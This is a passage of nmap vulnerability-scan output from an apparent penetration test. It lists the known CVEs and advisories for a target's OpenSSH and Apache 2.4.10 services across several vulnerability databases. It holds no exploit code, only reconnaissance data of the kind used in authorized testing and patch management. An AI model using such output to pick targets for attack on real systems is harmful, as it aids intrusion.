18404| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
18405| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
18406| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
18407| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
18408|
18409| SecurityFocus - https://www.securityfocus.com/bid/:
18410| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
18411| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
18412| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
18413| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
18414| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
18415| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
18416| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
18417| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
18418| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
18419| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
18420| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
18421| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
18422| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
18423| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
18424| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
18425| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
18426| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
18427| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
18428| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
18429| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
18430| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
18431| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
18432| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
18433| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
18434| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
18435| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
18436| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
18437| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
18438| [75990] OpenSSH Login Handling Security Bypass Weakness
18439| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
18440| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
18441| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
18442| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
18443| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
18444| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
18445| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
18446| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
18447| [61286] OpenSSH Remote Denial of Service Vulnerability
18448| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
18449| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
18450| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
18451| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
18452| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
18453| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
18454| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
18455| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
18456| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
18457| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
18458| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
18459| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
18460| [30794] Red Hat OpenSSH Backdoor Vulnerability
18461| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
18462| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
18463| [28531] OpenSSH ForceCommand Command Execution Weakness
18464| [28444] OpenSSH X Connections Session Hijacking Vulnerability
18465| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
18466| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
18467| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
18468| [20956] OpenSSH Privilege Separation Key Signature Weakness
18469| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
18470| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
18471| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
18472| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
18473| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
18474| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
18475| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
18476| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
18477| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
18478| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
18479| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
18480| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
18481| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
18482| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
18483| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
18484| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
18485| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
18486| [6168] OpenSSH Visible Password Vulnerability
18487| [5374] OpenSSH Trojan Horse Vulnerability
18488| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
18489| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
18490| [4241] OpenSSH Channel Code Off-By-One Vulnerability
18491| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
18492| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
18493| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
18494| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
18495| [2917] OpenSSH PAM Session Evasion Vulnerability
18496| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
18497| [2356] OpenSSH Private Key Authentication Check Vulnerability
18498| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
18499| [1334] OpenSSH UseLogin Vulnerability
18500|
18501| IBM X-Force - https://exchange.xforce.ibmcloud.com:
18502| [83258] GSI-OpenSSH auth-pam.c security bypass
18503| [82781] OpenSSH time limit denial of service
18504| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
18505| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
18506| [72756] Debian openssh-server commands information disclosure
18507| [68339] OpenSSH pam_thread buffer overflow
18508| [67264] OpenSSH ssh-keysign unauthorized access
18509| [65910] OpenSSH remote_glob function denial of service
18510| [65163] OpenSSH certificate information disclosure
18511| [64387] OpenSSH J-PAKE security bypass
18512| [63337] Cisco Unified Videoconferencing OpenSSH weak security
18513| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
18514| [45202] OpenSSH signal handler denial of service
18515| [44747] RHEL OpenSSH backdoor
18516| [44280] OpenSSH PermitRootLogin information disclosure
18517| [44279] OpenSSH sshd weak security
18518| [44037] OpenSSH sshd SELinux role unauthorized access
18519| [43940] OpenSSH X11 forwarding information disclosure
18520| [41549] OpenSSH ForceCommand directive security bypass
18521| [41438] OpenSSH sshd session hijacking
18522| [40897] OpenSSH known_hosts weak security
18523| [40587] OpenSSH username weak security
18524| [37371] OpenSSH username data manipulation
18525| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
18526| [37112] RHSA update for OpenSSH signal handler race condition not installed
18527| [37107] RHSA update for OpenSSH identical block denial of service not installed
18528| [36637] OpenSSH X11 cookie privilege escalation
18529| [35167] OpenSSH packet.c newkeys[mode] denial of service
18530| [34490] OpenSSH OPIE information disclosure
18531| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
18532| [32975] Apple Mac OS X OpenSSH denial of service
18533| [32387] RHSA-2006:0738 updates for openssh not installed
18534| [32359] RHSA-2006:0697 updates for openssh not installed
18535| [32230] RHSA-2006:0298 updates for openssh not installed
18536| [32132] RHSA-2006:0044 updates for openssh not installed
18537| [30120] OpenSSH privilege separation monitor authentication verification weakness
18538| [29255] OpenSSH GSSAPI user enumeration
18539| [29254] OpenSSH signal handler race condition
18540| [29158] OpenSSH identical block denial of service
18541| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
18542| [25116] OpenSSH OpenPAM denial of service
18543| [24305] OpenSSH SCP shell expansion command execution
18544| [22665] RHSA-2005:106 updates for openssh not installed
18545| [22117] OpenSSH GSSAPI allows elevated privileges
18546| [22115] OpenSSH GatewayPorts security bypass
18547| [20930] OpenSSH sshd.c LoginGraceTime denial of service
18548| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
18549| [17213] OpenSSH allows port bouncing attacks
18550| [16323] OpenSSH scp file overwrite
18551| [13797] OpenSSH PAM information leak
18552| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
18553| [13264] OpenSSH PAM code could allow an attacker to gain access
18554| [13215] OpenSSH buffer management errors could allow an attacker to execute code
18555| [13214] OpenSSH memory vulnerabilities
18556| [13191] OpenSSH large packet buffer overflow
18557| [12196] OpenSSH could allow an attacker to bypass login restrictions
18558| [11970] OpenSSH could allow an attacker to obtain valid administrative account
18559| [11902] OpenSSH PAM support enabled information leak
18560| [9803] OpenSSH "
18561| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
18562| [9307] OpenSSH is running on the system
18563| [9169] OpenSSH "
18564| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
18565| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
18566| [8383] OpenSSH off-by-one error in channel code
18567| [7647] OpenSSH UseLogin option arbitrary code execution
18568| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
18569| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
18570| [7179] OpenSSH source IP access control bypass
18571| [6757] OpenSSH "
18572| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
18573| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
18574| [5517] OpenSSH allows unauthorized access to resources
18575| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
18576|
18577| Exploit-DB - https://www.exploit-db.com:
18578| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
18579|
18580| OpenVAS (Nessus) - http://www.openvas.org:
18581| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
18582| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
18583| [881183] CentOS Update for openssh CESA-2012:0884 centos6
18584| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
18585| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
18586| [870763] RedHat Update for openssh RHSA-2012:0884-04
18587| [870129] RedHat Update for openssh RHSA-2008:0855-01
18588| [861813] Fedora Update for openssh FEDORA-2010-5429
18589| [861319] Fedora Update for openssh FEDORA-2007-395
18590| [861170] Fedora Update for openssh FEDORA-2007-394
18591| [861012] Fedora Update for openssh FEDORA-2007-715
18592| [840345] Ubuntu Update for openssh vulnerability USN-597-1
18593| [840300] Ubuntu Update for openssh update USN-612-5
18594| [840271] Ubuntu Update for openssh vulnerability USN-612-2
18595| [840268] Ubuntu Update for openssh update USN-612-7
18596| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
18597| [840214] Ubuntu Update for openssh vulnerability USN-566-1
18598| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
18599| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
18600| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
18601| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
18602| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
18603| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
18604| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
18605| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
18606| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
18607| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
18608| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
18609| [100584] OpenSSH X Connections Session Hijacking Vulnerability
18610| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
18611| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
18612| [65987] SLES10: Security update for OpenSSH
18613| [65819] SLES10: Security update for OpenSSH
18614| [65514] SLES9: Security update for OpenSSH
18615| [65513] SLES9: Security update for OpenSSH
18616| [65334] SLES9: Security update for OpenSSH
18617| [65248] SLES9: Security update for OpenSSH
18618| [65218] SLES9: Security update for OpenSSH
18619| [65169] SLES9: Security update for openssh,openssh-askpass
18620| [65126] SLES9: Security update for OpenSSH
18621| [65019] SLES9: Security update for OpenSSH
18622| [65015] SLES9: Security update for OpenSSH
18623| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
18624| [61639] Debian Security Advisory DSA 1638-1 (openssh)
18625| [61030] Debian Security Advisory DSA 1576-2 (openssh)
18626| [61029] Debian Security Advisory DSA 1576-1 (openssh)
18627| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
18628| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
18629| [60667] Slackware Advisory SSA:2008-095-01 openssh
18630| [59014] Slackware Advisory SSA:2007-255-01 openssh
18631| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
18632| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
18633| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
18634| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
18635| [57492] Slackware Advisory SSA:2006-272-02 openssh
18636| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
18637| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
18638| [57470] FreeBSD Ports: openssh
18639| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
18640| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
18641| [56294] Slackware Advisory SSA:2006-045-06 openssh
18642| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
18643| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
18644| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
18645| [53788] Debian Security Advisory DSA 025-1 (openssh)
18646| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
18647| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
18648| [11343] OpenSSH Client Unauthorized Remote Forwarding
18649| [10954] OpenSSH AFS/Kerberos ticket/token passing
18650| [10883] OpenSSH Channel Code Off by 1
18651| [10823] OpenSSH UseLogin Environment Variables
18652|
18653| SecurityTracker - https://www.securitytracker.com:
18654| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
18655| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
18656| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
18657| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
18658| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
18659| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
18660| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
18661| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
18662| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
18663| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
18664| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
18665| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
18666| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
18667| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
18668| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
18669| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
18670| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
18671| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
18672| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
18673| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
18674| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
18675| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
18676| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
18677| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
18678| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
18679| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
18680| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
18681| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
18682| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
18683| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
18684| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
18685| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
18686| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
18687| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
18688| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
18689| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
18690| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
18691| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
18692|
18693| OSVDB - http://www.osvdb.org:
18694| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
18695| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
18696| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
18697| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
18698| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
18699| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
18700| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
18701| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
18702| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
18703| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
18704| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
18705| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
18706| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
18707| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
18708| [56921] OpenSSH Unspecified Remote Compromise
18709| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
18710| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
18711| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
18712| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
18713| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
18714| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
18715| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
18716| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
18717| [43745] OpenSSH X11 Forwarding Local Session Hijacking
18718| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
18719| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
18720| [37315] pam_usb OpenSSH Authentication Unspecified Issue
18721| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
18722| [34601] OPIE w/ OpenSSH Account Enumeration
18723| [34600] OpenSSH S/KEY Authentication Account Enumeration
18724| [32721] OpenSSH Username Password Complexity Account Enumeration
18725| [30232] OpenSSH Privilege Separation Monitor Weakness
18726| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
18727| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
18728| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
18729| [29152] OpenSSH Identical Block Packet DoS
18730| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
18731| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
18732| [22692] OpenSSH scp Command Line Filename Processing Command Injection
18733| [20216] OpenSSH with KerberosV Remote Authentication Bypass
18734| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
18735| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
18736| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
18737| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
18738| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
18739| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
18740| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
18741| [6601] OpenSSH *realloc() Unspecified Memory Errors
18742| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
18743| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
18744| [6072] OpenSSH PAM Conversation Function Stack Modification
18745| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
18746| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
18747| [5408] OpenSSH echo simulation Information Disclosure
18748| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
18749| [4536] OpenSSH Portable AIX linker Privilege Escalation
18750| [3938] OpenSSL and OpenSSH /dev/random Check Failure
18751| [3456] OpenSSH buffer_append_space() Heap Corruption
18752| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
18753| [2140] OpenSSH w/ PAM Username Validity Timing Attack
18754| [2112] OpenSSH Reverse DNS Lookup Bypass
18755| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
18756| [1853] OpenSSH Symbolic Link 'cookies' File Removal
18757| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
18758| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
18759| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
18760| [688] OpenSSH UseLogin Environment Variable Local Command Execution
18761| [642] OpenSSH Multiple Key Type ACL Bypass
18762| [504] OpenSSH SSHv2 Public Key Authentication Bypass
18763| [341] OpenSSH UseLogin Local Privilege Escalation
18764|_
1876580/tcp open http Apache httpd 2.4.10 ((Debian))
18766|_http-server-header: Apache/2.4.10 (Debian)
18767| vulners:
18768| cpe:/a:apache:http_server:2.4.10:
18769| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
18770| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
18771| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
18772| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
18773| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
18774| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
18775| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
18776| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
18777| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
18778| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
18779| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
18780| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
18781| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
18782| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
18783| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
18784| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
18785| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
18786| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
18787| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
18788| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
18789| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
18790|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
18791| vulscan: VulDB - https://vuldb.com:
18792| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
18793| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
18794| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
18795| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
18796| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
18797| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
18798| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
18799|
18800| MITRE CVE - https://cve.mitre.org:
18801| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
18802| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
18803| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
18804| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
18805| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
18806| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
18807| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
